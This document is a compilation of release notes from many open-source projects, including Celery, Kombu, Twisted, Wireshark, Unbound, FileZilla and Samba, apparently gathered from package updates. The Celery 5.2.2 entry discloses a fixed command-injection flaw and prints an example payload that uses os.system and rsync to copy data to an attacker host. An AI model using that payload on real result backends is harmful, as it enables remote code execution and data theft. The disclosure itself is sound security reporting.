Changes not found. But note:
Important
Please note that from version 1.0.1 Flower uses Celery 5 and has
to be invoked in the same style as celery commands do.
The key takeaway here is that the Celery app's arguments have to
be specified after the celery command and Flower's arguments have
to be specified after the flower sub-command.
This is the template to follow:
celery [celery args] flower [flower args]
5.2.3
=====
- Allow redis >= 4.0.2.
- Upgrade minimum required pymongo version to 3.11.1.
- tested pypy3.8 beta (#6998).
- Split Signature.__or__ into subclasses' __or__ (#7135).
- Prevent duplication in event loop on Consumer restart.
- Restrict setuptools>=59.1.1,<59.7.0.
- Kombu bumped to v5.2.3
- py-amqp bumped to v5.0.9
- Some docs & CI improvements.
5.2.2
=====
- Various documentation fixes.
- Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in #4836.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
``os.system("rsync /data attacker@192.168.56.100:~/data")``
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload ``rsync /data attacker@192.168.56.100:~/data`` as the exception arguments like so:
.. code-block:: python
{
"exc_module": "os",
'exc_type': "system",
"exc_message": "rsync /data attacker@192.168.56.100:~/data"
}
According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.
5.2.1
=====
- Fix rstrip usage on bytes instance in ProxyLogger.
- Pass logfile to ExecStop in celery.service example systemd file.
- fix: reduce latency of AsyncResult.get under gevent (#7052)
- Limit redis version: <4.0.0.
- Bump min kombu version to 5.2.2.
- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
- Remove dependency to case (#7077).
- fix: task expiration is timezone aware if needed (#7065).
- Initial testing of pypy-3.8 beta to CI.
- Docs, CI & tests cleanups.
5.2.0
=====
- Prevent from subscribing to empty channels (#7040)
- fix register_task method.
- Fire task failure signal on final reject (#6980)
- Limit pymongo version: <3.12.1 (#7041)
- Bump min kombu version to 5.2.1
5.2.0rc2
========
- Bump Python 3.10.0 to rc2.
- [pre-commit.ci] pre-commit autoupdate (#6972).
- autopep8.
- Prevent worker to send expired revoked items upon hello command (#6975).
- docs: clarify the 'keeping results' section (#6979).
- Update deprecated task module removal in 5.0 documentation (#6981).
- [pre-commit.ci] pre-commit autoupdate.
- try python 3.10 GA.
- mention python 3.10 on readme.
- Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
- Azure blockblob backend parametrized connection/read timeouts (#6978).
- Add as_uri method to azure block blob backend.
- Add possibility to override backend implementation with celeryconfig (#6879).
- [pre-commit.ci] pre-commit autoupdate.
- try to fix deprecation warning.
- [pre-commit.ci] pre-commit autoupdate.
- not needed anyore.
- not needed anyore.
- not used anymore.
- add github discussions forum
5.2.0rc1
========
- Kill all workers when main process exits in prefork model (#6942).
- test kombu 5.2.0rc1 (#6947).
- try moto 2.2.x (#6948).
- Prepared Hacker News Post on Release Action.
- update setup with python 3.7 as minimum.
- update kombu on setupcfg.
- Added note about automatic killing all child processes of worker after its termination.
- [pre-commit.ci] pre-commit autoupdate.
- Move importskip before greenlet import (#6956).
- amqp: send expiration field to broker if requested by user (#6957).
- Single line drift warning.
- canvas: fix kwargs argument to prevent recursion (#6810) (#6959).
- Allow to enable Events with app.conf mechanism.
- Warn when expiration date is in the past.
- Add the Framework :: Celery trove classifier.
- Give indication whether the task is replacing another (#6916).
- Make setup.py executable.
- Bump version: 5.2.0b3 → 5.2.0rc1.
5.2.0b3
=======
- Add args to LOG_RECEIVED (fixes#6885) (#6898).
- Terminate job implementation for eventlet concurrency backend (#6917).
- Add cleanup implementation to filesystem backend (#6919).
- [pre-commit.ci] pre-commit autoupdate (#69).
- Add before_start hook (fixes#4110) (#6923).
- Restart consumer if connection drops (#6930).
- Remove outdated optimization documentation (#6933).
- added https verification check functionality in arangodb backend (#6800).
- Drop Python 3.6 support.
- update supported python versions on readme.
- [pre-commit.ci] pre-commit autoupdate (#6935).
- Remove appveyor configuration since we migrated to GA.
- pyugrade is now set to upgrade code to 3.7.
- Drop exclude statement since we no longer test with pypy-3.6.
- 3.10 is not GA so it's not supported yet.
- Celery 5.1 or earlier support Python 3.6.
- Fix linting error.
- fix: Pass a Context when chaining fail results (#6899).
- Bump version: 5.2.0b2 → 5.2.0b3.
5.2.0b2
=======
- Test windows on py3.10rc1 and pypy3.7 (#6868).
- Route chord_unlock task to the same queue as chord body (#6896).
- Add message properties to app.tasks.Context (#6818).
- handle already converted LogLevel and JSON (#6915).
- 5.2 is codenamed dawn-chorus.
- Bump version: 5.2.0b1 → 5.2.0b2.
5.2.0b1
=======
- Add Python 3.10 support (#6807).
- Fix docstring for Signal.send to match code (#6835).
- No blank line in log output (#6838).
- Chords get body_type independently to handle cases where body.type does not exist (#6847).
- Fix#6844 by allowing safe queries via app.inspect().active() (#6849).
- Fix multithreaded backend usage (#6851).
- Fix Open Collective donate button (#6848).
- Fix setting worker concurrency option after signal (#6853).
- Make ResultSet.on_ready promise hold a weakref to self (#6784).
- Update configuration.rst.
- Discard jobs on flush if synack isn't enabled (#6863).
- Bump click version to 8.0 (#6861).
- Amend IRC network link to Libera (#6837).
- Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872).
- Fix inspect --json output to return valid json without --quiet.
- Remove celery.task references in modules, docs (#6869).
- The Consul backend must correctly associate requests and responses (#6823).
5.2.3
What's Changed
create codeql actions by @auvipy in #1441
create security policy doc by @auvipy in #1440
drop as we dont use travis by @auvipy in #1442
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1443
Fix PyPy CI jobs by @illia-v in #1446
Allow redis >= 4.0.2 by @illia-v in #1445
SQS transport: detect FIFO queue properly by checking queue URL by @n0061q in #1450
Ensure that restore is atomic in redis transport by @matusvalo in #1444
test pyaqp v5.0.7 by @auvipy in #1457
try restrict setuptool in CI by @auvipy in #1472
try pining setuptools by @auvipy in #1466
test amqp v5.0.9 by @auvipy in #1462
reduce memory usage of Transport by @pawl in #1470
prevent event loop polling on closed redis transports (and causing leak) by @pawl in #1476
respect connection timeout by @mehdipourfar in #1458
prevent redis event loop stopping on 'consumer: Cannot connect' by @pawl in #1477
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1478
5.2.2
What's Changed
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1430
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1436
pin redis under 4.0.0 for now by @auvipy in #1437
5.2.1
What's Changed
Added integration test of failed authentication to redis by @matusvalo in #1423
Bump redis version to >= 3.4.1 by @matusvalo in #1422
add python 3.10 to classifier by @auvipy in #1424
python !=3.12.1 by @auvipy in #1427
Update librabbitmq.txt by @auvipy in #1426
try latest sqs dependencies by @auvipy in #1428
5.2.0
What's Changed
Revert "Added redis transport key_prefix from envvars" by @matusvalo in #1249
Redis Transport: Small improvements of SentinelChannel by @matusvalo in #1253
Fix pidbox not using default channels on master by @lambacck in #1258
Added self to AUTHORS by @vinayinvicible in #1260
Revert "on worker restart - restore visible regardless to time (#905)" by @vinayinvicible in #1259
Add vine to install dependencies by @chrisburr in #1265
Reformat and improve kombu transport reference docs by @matusvalo in #1264
Pin urllib3<1.26 to fix failing unittests. by @matusvalo in #1273
Add timeout to producer publish by @RezaSi in #1269
Added 4.6.8 changelog by @KFoxder in #1276
Remove python2 compatibility code by @matusvalo in #1277
redis: Support Sentinel with SSL by @auvipy in #1275
Update connections.rst with Redis sentinel example by @anudeepsamaiya in #1285
docs: fix simple typo, propery -> property by @timgates42 in #1286
Support for Azure Service Bus 7.0.0 by @terrycain in #1284
Allow specifying session token by @flying-sheep in #1283
Fix Azure Service Bus URL parsing by @terrycain in #1287
Python 3 style print statement by @rednafi in #1289
min py-amqp to 5.0.5 by @auvipy in #1292
attempt to update to tox docker 2.0 by @auvipy in #1293
http/curl: missing _set_timeout by @raittes in #1296
Stop treating namedtuple as an object when using simplejson by @Hardtack in #1297
SQS back-off policy by @galCohen88 in #1301
SQS retry policy documentation improvement by @galCohen88 in #1304
Port of redis code improvements from prior revision by @matteius in #1132
Revert "Port of redis code improvements from prior revision" by @matusvalo in #1307
Fixed SQS unittests by @matusvalo in #1308
fix: non kombu json message decoding in SQS transport by @moaddib666 in #1306
Add Github Actions CI by @matusvalo in #1309
Update default pickle protocol version to 4 by @illia-v in #1314
Update connection.py by @Krogsager in #1311
Drop support for the lzma backport by @thedrow in #1317
Fix tiny mistake in introduction by @der-gabe in #1312
Drop obsolete code importing pickle by @illia-v in #1315
Small doc fixes by @der-gabe in #1319
Update default login method for librabbitmq and pyamqp by @daviskirk in #936
SQS Broker - handle STS authentication with AWS by @galCohen88 in #1322
min py-amqp to v5.0.6 by @auvipy in #1325
Use a thread-safe implementation of cached_property by @thedrow in #1316
Azure Service Bus - versatile queue names fix by @tsunday in #1324
Fix CI failure by @thedrow in #1327
Add support for SQLAlchemy 1.4 by @thedrow in #1328
Opencollective bot is now configured by @thedrow in #1331
re order CI jobs to make lint the last by @auvipy in #1332
Coerce seconds argument to a floating point number. by @thedrow in #1330
Make flake8 and pydocstyle happy by @matusvalo in #1333
Remove unused appveyor and travis configuration files by @matusvalo in #1335
Ignore kombu.transport.librabbitmq in apicheck. by @matusvalo in #1334
chore: Refactor code quality issues by @akshgpt7 in #1320
Revert "chore: Refactor code quality issues" by @matusvalo in #1342
add accept parameter to SimpleQueue class by @lsaavedr in #1140
prepare_accept_content() now raises SerializerNotInstalled instead of KeyError by @matusvalo in #1343
Remove backward compatible code not used anymore by @matusvalo in #1344
Move pytest.importorskip to run earlier by @felixonmars in #1346
Add support for setting redis username by @gabor-boros in #1351
enable pre-commit by @graingert in #1355
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1359
Add support for Python 3.9 by @D3X in #1363
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1364
Use hostname from URI when server_host is None by @matusvalo in #1366
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1367
Use Python's built-in json module by default, instead of simplejson by @nikolas in #1368
Fixed type comment by @SchizmOne in #1371
SQS Channel.predefined_queues should be {} if not defined by @infinitewarp in #1372
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1374
Add global key prefix for keys set by Redis transporter by @gabor-boros in #1349
fix: raise BrokenPipeError exit on brokenpipe instead of hanging around by @jagguli in #1231
[FAL-2030] fix: add missing commands to prefix by @gabor-boros in #1376
Make BrokerState Transport specific by @matusvalo in #1378
Run integration tests for kombu also with global_keyprefix by @matusvalo in #1380
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1379
v 1.4.x by @auvipy in #1338
stop mentioning librabbitmq by @auvipy in #1381
test new pytest version by @auvipy in #1383
drop python 3.6 from CI by @auvipy in #1382
Fix missing dependency to redis in docs requirements by @matusvalo in #1386
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1387
Remove dependency to case by @matusvalo in #1389
Fix: check redis response type by @kaiix in #1390
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1393
py3.7+ on setup by @auvipy in #1392
Prevent caching of oid in pidbox by @matusvalo in #1394
fix flake8 in kombu/asynchronous/aws/connection.py by @matusvalo in #1397
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1396
Fix test_pidbox unittests to support non-linux platforms by @matusvalo in #1398
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1400
removre bdist by @auvipy in #1406
add python 3.10 to CI & fix other issues by @auvipy in #1402
try to fix CI by @auvipy in #1407
Dont failfast when pypy3 tests fail by @matusvalo in #1408
Return empty list instead of InconsistencyError when exchange table is empty by @matusvalo in #1404
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1410
5.2.0 release notes by @naomielst in #1417
Changes in version 0.4.6.10 - 2022-02-04
This version contains minor bugfixes but one in particular is that relays
don't advertise onion service v2 support at the protocol version level.
o Minor features (fallbackdir):
- Regenerate fallback directories generated on February 04, 2022.
o Minor features (geoip data):
- Update the geoip files to match the IPFire Location Database, as
retrieved on 2022/02/04.
o Minor bugfix (logging):
- Update a log notice dead URL to a working one. Fixes bug 40544;
bugfix on 0.3.5.1-alpha.
o Minor bugfix (relay):
- Remove the HSDir and HSIntro onion service v2 protocol versions so
relay stop advertising that they support them. Fixes bug 40509;
bugfix on 0.3.5.17.
o Minor bugfixes (MetricsPort, Prometheus):
- Add double quotes to the label values of the onion service
metrics. Fixes bug 40552; bugfix on 0.4.5.1-alpha.
Twisted 22.1.0 (2022-02-03)
===========================
Features
--------
- Python 3.10 is now a supported platform
- Type annotations have been added to the twisted.python.fakepwd module.
Bugfixes
--------
- twisted.internet.defer.inlineCallbacks has an improved type annotation, to avoid typing errors when it is used on a function which returns a non-None result.
- ``twisted.internet.base.DelayedCall.__repr__`` and ``twisted.internet.task.LoopingCall.__repr__`` had the changes from 10155 reverted to accept non-function callables.
- Revert the removal of .whl building that was done as part of 10177.
- The type annotation of the host parameter to twisted.internet.interfaces.IReactorTCP.connectTCP has been corrected from bytes to str.
- Deprecated ``twisted.python.threading.ThreadPool.currentThread()`` in favor of ``threading.current_thread()``.
Switched ``twisted.python.threading.ThreadPool.currentThread()`` and ``twisted.python.threadable.getThreadID()`` to use `threading.current_thread()`` to avoid the deprecation warnings introduced for ``threading.currentThread()`` in Python 3.10.
Improved Documentation
----------------------
- twisted.internet.utils.runWithWarningsSupressed behavior of waiting on deferreds has been documented.
- Sync API docs templates with pydoctor 21.9.0 release, using new theming capabilities.
Bugfixes
--------
- SSHTransportBase.ssh_KEXINIT now uses the remote peer preferred MAC list for negotiation. In previous versions it was only using the local preferred MAC list.
Features
~~~~~~~~
- twisted.conch.ssh now supports SSH extension negotiation (RFC 8308).
Bugfixes
~~~~~~~~
- twisted.conch now uses constant-time comparisons for MACs.
- twisted.conch.ssh.filetransfer.FileTransferServer will now return an ENOENT error status if an SFTP client tries to close an unrecognized file handle.
- twisted.web.client.RedirectAgent and twisted.web.client.BrowserLikeRedirectAgent now properly remove sensitive headers when redirecting to a different origin.
Improved Documentation
----------------------
- Add type annotations for twisted.web.client.readBody.
Deprecations and Removals
~~~~~~~~~~~~~~~~~~~~~~~~~
- twisted.web.client.getPage, twisted.web.client.downladPage, and the associated implementation classes (HTTPPageGetter, HTTPPageDownloader, HTTPClientFactory, HTTPDownloader) have been removed because they do not segregate cookies by domain. They were deprecated in Twisted 16.7.0 in favor of twisted.web.client.Agent. GHSA-92x2-jw7w-xvvx.
Mail
----
No significant changes.
Words
-----
No significant changes.
Names
-----
No significant changes.
Trial
-----
Bugfixes
~~~~~~~~
- trial.runner.filenameToModule now sets the correct module.__name__ and sys.modules key
Twisted is a framework, written in Python, for writing networked applications.
It includes implementations of a number of commonly used network services such
as a web server, an IRC chat server, a mail server, a relational database
interface and an object broker. Developers can build applications using all of
these services as well as custom services that they write themselves. Twisted
also includes a user authentication system that controls access to services
and provides services with user context information to implement their own
security models.
Note that while this package provides most of Twisted, Twisted Conch
(SSH client/server) only functions if security/py-amkCrypto is also
installed.
This package contains the last version supporting Python 2.
5.0.18.3, released 2021-12-24
Compatibility with aeson-2.0
5.0.18.2, released 2021-09-01
Compatibility with extra-1.7.10
#370, add --jsonl to produce JSON on separate lines
Version 3.1.2.7
* No change from 3.1.2.6 but to take a right procedure to upload "network"
to Hackage for Windows.
Version 3.1.2.6
* Making IPv4PktInfo on Win the same as that on Posix #522
* Add support for nix/ghcjs #517
Version 3.1.2.5
* Regenerate configure script with autoconf-2.69 to temporarily fix broken
cabal-3.4.0.0 on Windows. Note that the old one was generated with
autoconf-2.71. #513
Version 3.1.2.3
* Supporting M1 Mac #510
* Workaround for autoconf on Windows #508
* Fixing building failure on SmartOS #507
* HsNet.h: remove unused fn hsnet_inet_ntoa definition #504
* Use a working define for OpenBSD detection #503
Version 3.1.2.2
* Allow bytestring 0.11 #490
* Export StructLinger #491
* Fix a couple of broken tests on OpenBSD #498
Wireshark 3.6.2 Release Notes
What’s New
Bug Fixes
The following vulnerabilities have been fixed:
• wnpa-sec-2022-01[1] RTMPT dissector infinite loop. Issue
17813[2].
• wnpa-sec-2022-02[3] Large loops in multiple dissectors. Issue
17829[4], Issue 17842[5], Issue 17847[6], Issue 17855[7], Issue
17891[8], Issue 17925[9], Issue 17926[10], Issue 17931[11], Issue
17932[12], Issue 17933[13].
• wnpa-sec-2022-03[14] PVFS dissector crash. Issue 17840[15].
• wnpa-sec-2022-04[16] CSN.1 dissector crash. Issue 17882[17].
• wnpa-sec-2022-05[18] CMS dissector crash. Issue 17935[19].
The following bugs have been fixed:
• Support for GSM SMS TPDU in HTTP2 body Issue 17784[20].
• Wireshark 3.6.1 broke the ABI by removing ws_log_default_writer
from libwsutil Issue 17822[21].
• Fedora RPM package build failing with RPATH of /usr/local/lib64
Issue 17830[22].
• macos-setup.sh: ftp.pcre.org no longer exists Issue 17834[23].
• nmap.org/npcap → npcap.com: domain/URL change Issue 17838[24].
• MPLS ECHO FEC stack change TLV not dissected correctly Issue
17868[25].
• Attempting to open a systemd journal export file segfaults Issue
17875[26].
• Dissector bug on 802.11ac packets Issue 17878[27].
• The Info column shows only one NGAP/S1AP packet of several
packets inside an SCTP packet Issue 17886[28].
• Uninstalling Wireshark 3.6.1 on Windows 10 fails to remove the
installation directory because it doesn’t remove the User’s Guide
subdirectory and all its contents. Issue 17898[29].
• 3.6 doesn’t build without zlib Issue 17899[30].
• SIP Statistics no longer properly reporting method type
accounting Issue 17904[31].
• Fuzz job crash output: fuzz-2022-01-26-6940.pcap Issue 17909[32].
• SCTP retransmission detection broken for the first data chunk of
each association with relative TSN Issue 17917[33].
• “Show In Folder” doesn’t work correctly for filenames with spaces
Issue 17927[34].
New and Updated Features
New Protocol Support
There are no new protocols in this release.
Updated Protocol Support
AMP, ASN.1 PER, ATN-ULCS, BGP, BP, CFLOW, CMS, CSN.1, GDSDB, GSM RP,
GTP, HTTP3, IEEE 802.11 Radiotap, IPDC, ISAKMP, Kafka, MP2T, MPEG
PES, MPEG SECT, MPLS ECHO, NGAP, NTLMSSP, OpenFlow 1.4, OpenFlow 1.5,
P_MUL, PN-RT, PROXY, PTP, PVFS, RSL, RTMPT, rtnetlink, S1AP, SCTP,
Signal PDU, SIP, TDS, USB, WAP, and ZigBee ZCL
New and Updated Capture File Support
BLF and libpcap
New File Format Decoding Support
There is no new or updated file format support in this release.
v1.17.0
This is a long overdue release!
Added:
Update records
Delete records
Support for Projects in Manager
Loadbalancer missing properties
Changed:
Updated Loadbalancer docs
* [youtube:search] Fix extractor by
[coletdjnz](https://github.com/coletdjnz)
* [youtube:search] Add tests
* [twitcasting] Enforce UTF-8 for POST payload by
[Lesmiscore](https://github.com/Lesmiscore)
* [mediaset] Fix extractor by
[nixxo](https://github.com/nixxo)
* [websocket] Make syntax error in `websockets` module non-fatal
Pkgsrc changes:
* none, other than checksums.
Upstream changes:
This release has bug fixes for crashes that happened on heavy network
usage. The default for the aggressive-nsec option has changed, it is now
enabled.
The ratelimit logic had to be reworked for the crash fixes. As a result,
there are new options to control the behaviour of ratelimiting.
The ratelimit-backoff and ip-ratelimit-backoff options can be used to
control how severe the backoff is when the ratelimit is exceeded.
The rpz-signal-nxdomain-ra option can be used to unset the RA flag, for
NXDOMAIN answers from RPZ. That is used by some clients to detect that
the domain is externally blocked. The RPZ option for-downstream can be
used like for auth zones, this allows the RPZ zone information to be
queried. That can be useful for monitoring scripts.
Features
- Fix#596: unset the RA bit when a query is blocked by an unbound
RPZ nxdomain reply. The option rpz-signal-nxdomain-ra allows to
signal that a domain is externally blocked to clients when it
is blocked with NXDOMAIN by unsetting RA.
- Add rpz: for-downstream: yesno option, where the RPZ zone is
authoritatively answered for, so the RPZ zone contents can be
checked with DNS queries directed at the RPZ zone.
- Merge PR #616: Update ratelimit logic. It also introduces
ratelimit-backoff and ip-ratelimit-backoff configuration options.
- Change aggressive-nsec default to yes.
Bug Fixes
- Fix compile warning for if_nametoindex on windows 64bit.
- Merge PR #581 from fobser: Fix -Wmissing-prototypes and -Wshadow
warnings in rpz.
- Fix validator debug output about DS support, print correct algorithm.
- Add code similar to fix for ldns for tab between strings, for
consistency, the test case was not broken.
- Allow local-data for classes other than IN to inherit a configured
local-zone's type if possible, instead of defaulting to type
transparent as per the implicit rule.
- Fix to pick up other class local zone information before unlock.
- Add missing configure flags for optional features in the
documentation.
- Fix Unbound capitalization in the documentation.
- Fix#591: Unbound-anchor manpage links to non-existent license file.
- contrib/aaaa-filter-iterator.patch file renewed diff content to
apply cleanly to the current coderepo for the current code version.
- Fix to add test for rpz-signal-nxdomain-ra.
- Fix#596: only unset RA when NXDOMAIN is signalled.
- Fix that RPZ does not set RD flag on replies, it should be copied
from the query.
- Fix for #596: fix that rpz return message is returned and not just
the rcode from the iterator return path. This fixes signal unset RA
after a CNAME.
- Fix unit tests for rpz now that the AA flag returns successfully from
the iterator loop.
- Fix for #596: add unit test for nsdname trigger and signal unset RA.
- Fix for #596: add unit test for nsip trigger and signal unset RA.
- Fix#598: Fix unbound-checkconf fatal error: module conf
'respip dns64 validator iterator' is not known to work.
- Fix for #596: Fix rpz-signal-nxdomain-ra to work for clientip
triggered operation.
- Merge #600 from pemensik: Change file mode before changing file
owner.
- Fix prematurely terminated TCP queries when a reply has the same ID.
- For #602: Allow the module-config "subnetcache validator cachedb
iterator".
- Fix EDNS to upstream where the same option could be attached
more than once.
- Add a region to serviced_query for allocations.
- For dnstap, do not wakeupnow right there. Instead zero the timer to
force the wakeup callback asap.
- Fix#610: Undefine-shift in sldns_str2wire_hip_buf.
- Fix#588: Unbound 1.13.2 crashes due to p->pc is NULL in
serviced_udp_callback.
- Merge PR #612: TCP race condition.
- Test for NSID in SERVFAIL response due to DNSSEC bogus.
- Fix#599: [FR] RFC 9156 (obsoletes RFC 7816), by noting the new RFC
document.
- Fix tls-* and ssl-* documented alternate syntax to also be available
through remote-control and unbound-checkconf.
- Better cleanup on failed DoT/DoH listening socket creation.
- iana portlist update.
- Fix review comment for use-after-free when failing to send UDP out.
- Merge PR #603 from fobser: Use OpenSSL 1.1 API to access DSA and RSA
internals.
- Merge PR #532 from Shchelk: Fix: buffer overflow bug.
- Merge PR #617: Update stub/forward-host notation to accept port and
tls-auth-name.
- Update stream_ssl.tdir test to also use the new forward-host
notation.
- Fix header comment for doxygen for authextstrtoaddr.
- please clang analyzer for loop in test code.
- Fix docker splint test to use more portable uname.
- Update contrib/aaaa-filter-iterator.patch with diff for current
software version.
- Fix for #611: Integer overflow in sldns_wire2str_pkt_scan.
3.57.0 (2021-12-10)
- Fixed incorrect default settings for file editing
- Fixed a crash looking up data in file lists
- Fixed a crash if a HTTPS connection gets canceled during the TLS handshake
- Updated to libfilezilla 0.35.0
3.56.2 (2021-10-27)
- Fixed a potential crash after uploading
3.56.1 (2021-10-26)
- macOS Monterey: Opening the Site Manager on startup is now delayed a millisecond, otherwise the right mouse button would have stopped working
- macOS: Fixed getting temporary directory
- MSW: Updated to libfilezilla 0.34.1 to fix local directory contents returned by the system in oversized buffers containing nulls
3.56.0 (2021-10-11)
- Updated to libfilezilla 0.34.0
- Updated translations
3.56.0-rc1 (2021-09-29)
+ Right-clicking a queue tab header now opens the same context menu as right-clicking the correponding queue contents
+ By default, the minimum allowed TLS version is now TLS 1.2
+ Optionally, the systen trust store can be used for certificate verification
- FTP: Fixed an issue with key file conversion
- Fixed an issue loading servers not supporting session resumption from storage
0.36.0 (2022-02-02)
+ Added parameter to tls_layer::set_alpn to control which peer has priority over which ALPN is chosen.
+ Added fz::hmac_sha1
+ Mutex debugging framework to detect locking order inversions that may lead to deadlocks
+ Add additional io_redirect mode to fz::process_spawn where the parent-side handles for stdin/out/err are always closed
- fz::json: Handle object members with empty string as name
- Minor performance improvements to removing timers and to spawning processes
0.35.0 (2021-12-08)
+ *nix: Added fz::forkblock which can be used to safely set FD_CLOEXEC on descriptors even if the system lacks SOCK_CLOCKEXEC, MSG_CMSG_CLOEXEC, pipe2 or accept4
+ macOS: Impersonation support
+ Added fz::tls_layer::set_unexpected_eof_cb, in some situations it may be desirable that unexpected closure is not reported as a hard errror
- Added various convenience overloads for fz::buffer
- Performance improvement for fz::json::to_string
0.34.2 (2021-10-26)
+ fz::file::open now returns fz::result
- fz::tls_layer: Additional fixes for trust path extration
- MSW: fz::local_filesys::get_next_file now handles directory contents returned by the kernel in oversized buffers with embedded nulls
0.34.1 (2021-10-19)
- *nix: Handle supplementary groups when impersonating
- *nix: fz::recv_fd now sets the MSG_CMSG_CLOEXEC flag
- *nix: fz::local_filesys::get_link_target now handles link targets larger than 1024 bytes
- MSW: Restrict DLL search path for system DLLs to the system32 directory
- fz::tls_layer: Fixed how trust path extration interacts with CRLs
0.34.0 (2021-10-11)
- MSW: Load shell32.dll and ole32.dll on-demand at runtime, it is not available in all environments
- Made fz::local_filesys movable
0.33.0 (2021-09-29)
+ MSW: Add local_filesys::begin_find_files overload accepting a directory HANDLE
+ If peer certificate chain is trusted by the system trust store, tls_session_info::get_certificates now returns the actual path to the trust anchor, use tls_session_info::get_peer_certificates to get the peer certificates as received by the server. GnuTLS 3.7.0 or later is required.
- JSON: Correctly handle \u-encoded UTF-16 surrogate pairs
0.32.0 (2021-09-14)
+ MSW: Impersonation support
- Allow more direct control over session ticket/PSK generation under TLS 1.3, requires GnuTLS 3.6.14 or later
- Ensure an error is returned if accepting a socket fails
- Fixed appending to fz::buffer
0.32.0-beta1 (2021-08-30)
+ *nix: Impersonation support
+ *nix: Sending of file descriptors over Unix Domain Sockets
* nix: Add local_filesys::begin_find_files overload accepting a directory file descriptor
+ Allow creating fz::file from a file descriptors/handle, add function to detach the descriptor/handle
+ Added fz::datetime::operator>=
+ Added fz::duration::absolute()
- fz::sprintf no longer crashes on x and X conversion specifiers if a negative signed integer is passed as argument
- Replace std::random_device as the C++ standard allows it to not be random
- JSON: Fixed crash if assigning values from nested values
- JWS: Fixed memory leak and padding of signature components
Changes:
## 1.20.3
- Fixes to kemonoparty and twitter extractors.
## 1.20.2
- Add event extractor for twitter
- Add `--source-address` command-line option #2206
- Enable cards option on twitter extractor by default
- Several fixes
## 1.20.1
- Add newgrounds search extractor
- Restore `-d/--dest` functionality from before 1.20.0
- Change short option for `--directory` to `-D`
- Several fixes
## 1.20.0
- Improve several extractors
- Add a generic extractor
- Add `-d/--directory` and `-f/--filename` command-line options
- Add `--sleep-request` and `--sleep-extractor` command-line options
- Prefer yt-dlp over youtube-dl
- Rename `--write-infojson` to `--write-info-json`
- Several fixes
## 1.19.3
- Improve several extractors
- Several fixes
- Remove seisoparty
## 1.19.2
- Improve several extractors
- Several fixes
## 1.19.1 - 2021-10-24
- Improve several extractors
- Several fixes
## 1.19.0 - 2021-10-01
- Improve several extractors
- Implement a download progress indicator
- Implement a `page-reverse` option
- Implement a way to specify extended format strings
- Add a `--write-infojson` command-line option
- Several fixes
iperf-3.11
----------
* Notable user-visible changes
* Update links to Discussions in documentation
* Fix DSCP so that TOS = DSCP * 4
* Fix --bind-dev for TCP streams
* Fix interface specification so doesn't overlap with IPv6 link-local addresses for -c and -B
* Add get/set test_unit_format function declaration to iperf_api.h
* Auto adjustment of test-end condition for file transfers (-F), if no end condition is set, it will automatically adjust it to file size in bytes
* Exit if idle time expires waiting for a connection in one-off mode
* Support zerocopy by reverse mode
* Update help and manpage text for 1157, support bind device
* Consistently print target_bandwidth in JSON start section
* Test bitrate added to JSON output
* Remove fsync call after every write to receiving --file
* Update documentation for -w
* Fix for 952, different JSON object names for bidir reverse channel
0.38.1
Improve performance of query scheduler
Avoid linear type searches in ServiceBrowsers
0.38.0
Handle Service types that end with another service type
Backwards incompatible:
Dropped Python 3.6 support
===============================
Release Notes for Samba 4.13.17
January 31, 2022
===============================
This is a security release in order to address the following defects:
o CVE-2021-44142: Out-of-Bound Read/Write on Samba vfs_fruit module.
https://www.samba.org/samba/security/CVE-2021-44142.html
o CVE-2022-0336: Re-adding an SPN skips subsequent SPN conflict checks.
https://www.samba.org/samba/security/CVE-2022-0336.html
Changes since 4.13.16
---------------------
o Ralph Boehme <slow@samba.org>
* BUG 14914: CVE-2021-44142
o Joseph Sutton <josephsutton@catalyst.net.nz>
* BUG 14950: CVE-2022-0336
